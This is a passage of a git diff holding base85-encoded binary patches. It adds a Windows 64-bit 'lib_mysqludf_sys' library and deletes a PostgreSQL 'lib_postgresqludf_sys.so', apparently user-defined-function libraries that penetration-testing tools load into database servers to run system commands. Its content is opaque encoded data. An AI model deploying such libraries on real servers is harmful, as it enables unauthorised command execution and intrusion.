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

diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/udf/mysql/windows/64/lib_mysqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..c06f77f2294b196b64954a561f14935dfa88c7ed
GIT binary patch
literal 4773
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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so
deleted file mode 100644
index ce33ad34e69a06d9b62e6caf53da33135c5f5a44..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5124
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
